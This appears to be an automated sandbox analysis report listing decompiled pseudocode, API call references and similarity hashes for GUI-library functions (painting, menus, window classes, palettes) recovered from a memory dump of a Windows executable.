				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0043F370(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43d1e0);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E004140D0( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043D21C(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43d1e7);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0043F370(_v8),  &_v84);
				}
				return _t55;
			}

0x0043d0c1
0x0043d0c3
0x0043d0c9
0x0043d0cc
0x0043d0d2
0x0043d0d7
0x0043d0eb
0x0043d0eb
0x0043d0ef
0x0043d0f0
0x0043d0f5
0x0043d0f8
0x0043d105
0x0043d11f
0x0043d122
0x0043d135
0x0043d138
0x0043d13a
0x0043d13b
0x0043d13d
0x0043d148
0x0043d151
0x0043d163
0x00000000
0x0043d165
0x0043d181
0x0043d188
0x00000000
0x00000000
0x0043d188
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d18a
0x0043d18a
0x0043d18b
0x0043d18b
0x0043d13d
0x0043d18e
0x0043d192
0x0043d19b
0x0043d19b
0x0043d1a6
0x0043d107
0x0043d10e
0x0043d10e
0x0043d1b2
0x0043d1b9
0x0043d1bc
0x0043d1bf
0x0043d1c4
0x0043d1cb
0x00000000
0x0043d1da
0x0043d1df

APIs

BeginPaint.USER32(00000000,?), ref: 0043D0E6
SaveDC.GDI32(?), ref: 0043D11A
ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043D17C
RestoreDC.GDI32(?,?), ref: 0043D1A6
EndPaint.USER32(00000000,?,0043D1E7), ref: 0043D1DA

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: f2f0eee0f97ab0e62457cc266fb7d31b60c357ee18698738b628449a29af5b0f
Instruction ID: 3135e43bd7cc1ec86384c1f1433b6b455f76895a2ee8dd3dc83cca89d9da0087
Opcode Fuzzy Hash: f2f0eee0f97ab0e62457cc266fb7d31b60c357ee18698738b628449a29af5b0f
Instruction Fuzzy Hash: 29415D70E00204AFCB10DF99D885FAEB7F9EF48318F1590AAE5049B362D739AD45CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041BC00, Relevance: 7.6, APIs: 5, Instructions: 89
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041BC00() {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t16;
				char _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t58 = _t60;
				_t61 = _t60 + 0xfffffff0;
				_push(_t39);
				_push(_t55);
				_push(_t53);
				_t16 = GetCurrentThreadId();
				_t47 =  *0x48e858; // 0x48f030
				if(_t16 !=  *_t47) {
					_v20 = GetCurrentThreadId();
					_v16 = 0;
					_t46 =  *0x48e6e8; // 0x4103d8
					E0040A1E0(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
					E00403D80();
				}
				if( *0x48fa00 == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(0x48fa04);
					L00406840();
					_push(_t58);
					_push(0x41bd16);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					if( *0x4714b8 == 0) {
						L5:
						_t19 = 0;
					} else {
						_t34 =  *0x4714b8; // 0x0
						if( *((intOrPtr*)(_t34 + 8)) > 0) {
							_t19 = 1;
						} else {
							goto L5;
						}
					}
					_v5 = _t19;
					if(_v5 != 0) {
						while(1) {
							_t21 =  *0x4714b8; // 0x0
							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
								break;
							}
							_t22 =  *0x4714b8; // 0x0
							_v12 = E004140D0(_t22, 0);
							_t24 =  *0x4714b8; // 0x0
							E00413FC0(_t24, 0);
							 *[fs:eax] = _t61;
							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41bcc9, _t58);
							_pop(_t51);
							 *[fs:eax] = _t51;
							SetEvent( *(_v12 + 4));
						}
						 *0x48fa00 = 0;
					}
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E0041BD21);
					_push(0x48fa04);
					L00406990();
					return 0;
				}
			}

0x0041bc01
0x0041bc03
0x0041bc06
0x0041bc07
0x0041bc08
0x0041bc09
0x0041bc0e
0x0041bc16
0x0041bc1d
0x0041bc20
0x0041bc2a
0x0041bc37
0x0041bc3c
0x0041bc3c
0x0041bc48
0x0041bd1d
0x0041bd2a
0x0041bc4e
0x0041bc4e
0x0041bc53
0x0041bc5a
0x0041bc5b
0x0041bc60
0x0041bc63
0x0041bc6d
0x0041bc7a
0x0041bc7a
0x0041bc6f
0x0041bc6f
0x0041bc78
0x0041bc7e
0x00000000
0x00000000
0x00000000
0x0041bc78
0x0041bc80
0x0041bc87
0x0041bcec
0x0041bcec
0x0041bcf5
0x00000000
0x00000000
0x0041bc8d
0x0041bc97
0x0041bc9c
0x0041bca1
0x0041bcb1
0x0041bcbc
0x0041bcc1
0x0041bcc4
0x0041bce7
0x0041bce7
0x0041bcf7
0x0041bcf7
0x0041bd00
0x0041bd03
0x0041bd06
0x0041bd0b
0x0041bd10
0x0041bd15
0x0041bd15

APIs

GetCurrentThreadId.KERNEL32 ref: 0041BC09
GetCurrentThreadId.KERNEL32 ref: 0041BC18
RtlEnterCriticalSection.KERNEL32(0048FA04,?,?,00000000), ref: 0041BC53
SetEvent.KERNEL32(?,?,0048FA04,?,?,00000000), ref: 0041BCE7
RtlLeaveCriticalSection.KERNEL32(0048FA04,0041BD21,0048FA04,?,?,00000000), ref: 0041BD10

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalCurrentSectionThread$EnterEventLeave
String ID:
API String ID: 130076905-0
Opcode ID: e270eee21ea3552e09c9b7b7e307c2fa1c69c077b17729c4e4947cdfa5301778
Instruction ID: 4987ef042376d355f65bd83c15d1d7c11e0dbfb86faa406ef20a701e8048415b
Opcode Fuzzy Hash: e270eee21ea3552e09c9b7b7e307c2fa1c69c077b17729c4e4947cdfa5301778
Instruction Fuzzy Hash: 7F310430604244DFE311EB69DC82B9E7BE8EB49314F5584BEE805977A1DB3C5885CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0046A7C4, Relevance: 7.6, APIs: 5, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0046A7C4(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
				struct tagRECT _v20;
				void* __edi;
				void* __ebp;
				int _t17;
				CHAR* _t19;
				int _t31;
				CHAR* _t33;
				int _t43;
				CHAR* _t45;
				void* _t49;
				signed int _t56;
				int _t57;
				void* _t61;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t60 = __ecx;
				_t49 = __edx;
				_t56 = _a4;
				E0041F8D4( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
				if(_a8 != 1) {
					_t57 = _t56 | 0x00000005;
					__eflags = _t57;
					_t17 = E004045D8(__ecx);
					_t19 = E004047D0(__ecx);
					return DrawTextA(E00420244(_t49), _t19, _t17,  &_v20, _t57);
				}
				OffsetRect( &_v20, 1, 1);
				E0041EFCC( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
				_t31 = E004045D8(_t60);
				_t33 = E004047D0(_t60);
				DrawTextA(E00420244(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E0041EFCC( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
				_t43 = E004045D8(_t60);
				_t45 = E004047D0(_t60);
				return DrawTextA(E00420244(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
			}

0x0046a7d3
0x0046a7d4
0x0046a7d5
0x0046a7d6
0x0046a7d7
0x0046a7d9
0x0046a7db
0x0046a7e3
0x0046a7ec
0x0046a874
0x0046a874
0x0046a87e
0x0046a886
0x00000000
0x0046a894
0x0046a7fa
0x0046a807
0x0046a818
0x0046a820
0x0046a82e
0x0046a83b
0x0046a848
0x0046a857
0x0046a85f
0x00000000

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0046A7FA
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046A82E
OffsetRect.USER32(?,000000FF,000000FF), ref: 0046A83B
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046A86D
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046A894

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText$OffsetRect
String ID:
API String ID: 1886049697-0
Opcode ID: bdba36bdd338d71531e73a1986283dc74329c030fc1e85f075fabb976377156e
Instruction ID: 28bc9e4762f99f59362df802305d2fb5610095d317cc4f66a77b0e2bf3a65580
Opcode Fuzzy Hash: bdba36bdd338d71531e73a1986283dc74329c030fc1e85f075fabb976377156e
Instruction Fuzzy Hash: F521A4B170051567CB00FA6E9C45E9F72AC5F45318F10063FB918F7282EA7DE911476D

Uniqueness

Uniqueness Score: -1.00%

Function 00448E98, Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00448E98(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E00448E98(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E00448FC8(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E00448FC8(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E00448FC8(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E00448D64(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x4479b8; // 0x447a04
						if(E00403740( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00448FC8(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}

0x00448e98
0x00448e9c
0x00448ea2
0x00448eac
0x00448eae
0x00000000
0x00448eae
0x00448eb7
0x00448ebc
0x00000000
0x00448ebe
0x00448ed0
0x00448ed5
0x00448ed9
0x00448ede
0x00448ee7
0x00448ef1
0x00448ef8
0x00448f08
0x00448f0d
0x00448f0d
0x00448f0f
0x00448f10
0x00448f16
0x00448f1c
0x00448f51
0x00448f53
0x00448f58
0x00000000
0x00448f5e
0x00448f21
0x00448f2e
0x00000000
0x00448f41
0x00448f45
0x00448f4c
0x00000000
0x00448f4c
0x00448f2e
0x00448f16
0x00448f65

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f3d75ef201c72181aead25349ed9e64195085900d22fe07201b57564b5e4374
Instruction ID: 307f6af9cd1b0d590384dd5b18a26c328ad7071897b1c15ffb15a35cf8c7eed3
Opcode Fuzzy Hash: 5f3d75ef201c72181aead25349ed9e64195085900d22fe07201b57564b5e4374
Instruction Fuzzy Hash: 1911B1217053185AFB60AA3A8905B5F268A9F6170DF44042FBD05EB3C3CE3CDC4A829C

Uniqueness

Uniqueness Score: -1.00%

Function 00458888, Relevance: 7.6, APIs: 5, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00458888(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x48f714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00435BD0(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043F370(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}

0x00458888
0x0045888c
0x0045888e
0x00458890
0x00458892
0x0045889a
0x00458939
0x0045893f
0x004588ab
0x004588b0
0x004588b4
0x0045891a
0x00458937
0x00458937
0x00000000
0x0045891a
0x004588b6
0x004588b8
0x004588b8
0x004588bd
0x004588d8
0x004588e1
0x004588d6
0x00000000
0x004588d6
0x004588e9
0x004588eb
0x004588eb
0x00000000
0x004588c7
0x004588cc
0x004588ed
0x00458906
0x00458908
0x00458908
0x00000000
0x00458906
0x004588bd

APIs

GetCapture.USER32 ref: 004588AB
SendMessageA.USER32(00000000,-0000BBEE,00470838,?), ref: 004588FF
GetWindowLongA.USER32 ref: 0045890F
SendMessageA.USER32(00000000,-0000BBEE,00470838,?), ref: 0045892E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CaptureLongWindow
String ID:
API String ID: 1158686931-0
Opcode ID: 5e0c0322ffd41ed8ffe50e6811b60277c83cf391d51247fabccce89aca0e8f16
Instruction ID: 692a41f2d512956f4ac2e3d47556f8183bcaa3c67a57267c608a671e3ecc12fe
Opcode Fuzzy Hash: 5e0c0322ffd41ed8ffe50e6811b60277c83cf391d51247fabccce89aca0e8f16
Instruction Fuzzy Hash: DC1151B120560A9FD620BA5EC940B2773DCDB15355B50043EFE5AE3353EE28FC08836A

Uniqueness

Uniqueness Score: -1.00%

Function 00424A88, Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00424A88(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00423408(_t22);
					}
					_t21 = E00420D2C( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00406E30();
						_t21 = E0042063C(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00406B00();
							_push(0xe);
							_push(_t38);
							L00406B00();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00407090();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}

0x00424a88
0x00424a8c
0x00424a8e
0x00424a95
0x00424aaf
0x00424ab5
0x00424ab7
0x00424ab7
0x00424ace
0x00424ad3
0x00424ad5
0x00424ada
0x00424adc
0x00424ade
0x00424ae3
0x00424ae8
0x00424aee
0x00424b17
0x00424b17
0x00424af0
0x00424af0
0x00424af2
0x00424af3
0x00424afa
0x00424afc
0x00424afd
0x00424b02
0x00424b0d
0x00424b11
0x00000000
0x00424b13
0x00424b13
0x00424b13
0x00424b11
0x00424b19
0x00424b1e
0x00424b21
0x00424b26
0x00424b26
0x00424b29
0x00424b2a
0x00424b2c
0x00424b35
0x00424b37
0x00000000
0x00424b37
0x00424b35
0x00424ada
0x00424b3f

APIs

72E7AC50.USER32(00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424ADE
72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AF3
72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424AFD
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B21
72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,004235DF,00000000,0042366B), ref: 00424B2C

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: B380CreateHalftonePalette
String ID:
API String ID: 178651289-0
Opcode ID: 0e769c16af81a4abf07060273bde6f3e8affae6b7ea13075f9f2cc1ce535cd8e
Instruction ID: 5da82dee5c179023c5e14cd6fbcfed6966ad1e16084388927fb4574cc5acc68a
Opcode Fuzzy Hash: 0e769c16af81a4abf07060273bde6f3e8affae6b7ea13075f9f2cc1ce535cd8e
Instruction Fuzzy Hash: D411B7217052759AEB20EF36A4817EF7E90EB51355F80012AF80497682D7B8EC91C3A9

Uniqueness

Uniqueness Score: -1.00%

Function 00455FE4, Relevance: 7.6, APIs: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00455FE4(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x471b20 != 0) {
					_t16 = E0043F674(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E0043F370(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e2)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E0043F370(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x471b20(E0043F370(_t38),  *((intOrPtr*)(_t38 + 0x2e4)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x00471BA4 |  *0x00471BAC);
						} else {
							SetWindowLongA(E0043F370(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E0043F370(_t38);
							_push(_t37);
							L00407068();
							return _t37;
						}
					}
				}
				return _t16;
			}

0x00455fe4
0x00455fe6
0x00455fec
0x00456001
0x00456008
0x0045601d
0x00456026
0x00456037
0x0045604a
0x0045604a
0x00000000
0x0045608c
0x0045609d
0x004560a2
0x004560a7
0x004560a9
0x004560ad
0x004560b2
0x004560b3
0x00000000
0x004560b3
0x00456026
0x00456008
0x004560ba

APIs

GetWindowLongA.USER32 ref: 00456018
SetWindowLongA.USER32 ref: 0045604A
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,00453C50), ref: 00456084
SetWindowLongA.USER32 ref: 0045609D
72E7B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,00453C50), ref: 004560B3

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesB330Layered
String ID:
API String ID: 1770052509-0
Opcode ID: 2deb61a0238565db0f64e6d34c20662e8747d994625db548357045a5d890eb10
Instruction ID: ccda71b2ec37f1bb124b02cfe36db7acdd109c0cd4e888212a433b47f4873f41
Opcode Fuzzy Hash: 2deb61a0238565db0f64e6d34c20662e8747d994625db548357045a5d890eb10
Instruction Fuzzy Hash: F611A360E4469069DB50AE7D8C89B8A264C1B09355F59257ABC49EB3E3C76CD88CC36C

Uniqueness

Uniqueness Score: -1.00%

Function 0041CE6C, Relevance: 7.6, APIs: 5, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041CE6C(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t6 =  *0x48f714; // 0x400000
				 *0x4714d0 = _t6;
				_t8 =  *0x4714e4; // 0x41ce5c
				_t9 =  *0x48f714; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00406D08 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x48f714; // 0x400000
						_t20 =  *0x4714e4; // 0x41ce5c
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x4714c0);
				}
				_t13 =  *0x48f714; // 0x400000
				_t14 =  *0x4714e4; // 0x41ce5c
				_t22 = CreateWindowExA(0x80, _t14, 0x41cf1c, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041CDB0(_a4, _a8));
				}
				return _t22;
			}

0x0041ce73
0x0041ce78
0x0041ce81
0x0041ce87
0x0041ce8d
0x0041ce95
0x0041ce97
0x0041ce9a
0x0041cea8
0x0041ceaa
0x0041ceb0
0x0041ceb6
0x0041ceb6
0x0041cec0
0x0041cec0
0x0041cec7
0x0041cee3
0x0041cef3
0x0041cefa
0x0041cf0b
0x0041cf0b
0x0041cf16

APIs

GetClassInfoA.USER32 ref: 0041CE8D
UnregisterClassA.USER32 ref: 0041CEB6
RegisterClassA.USER32 ref: 0041CEC0
CreateWindowExA.USER32 ref: 0041CEEE
SetWindowLongA.USER32 ref: 0041CF0B

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Window$CreateInfoLongRegisterUnregister
String ID:
API String ID: 3404767174-0
Opcode ID: 442a9df88b62dff0b0105b08e1ba3c5d5aa1baa634b55fba360c3f68cee1df1f
Instruction ID: a8393ad85677e835f3f75873210baaa383f01e48bbd737e5eb2461ebade1ee17
Opcode Fuzzy Hash: 442a9df88b62dff0b0105b08e1ba3c5d5aa1baa634b55fba360c3f68cee1df1f
Instruction Fuzzy Hash: D5016171644200ABDB10EFA8EDC1FDA339DE709304F144636F909E72E2D735A898876D

Uniqueness

Uniqueness Score: -1.00%

Function 00420C94, Relevance: 7.6, APIs: 5, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E00420C94(intOrPtr __eax) {
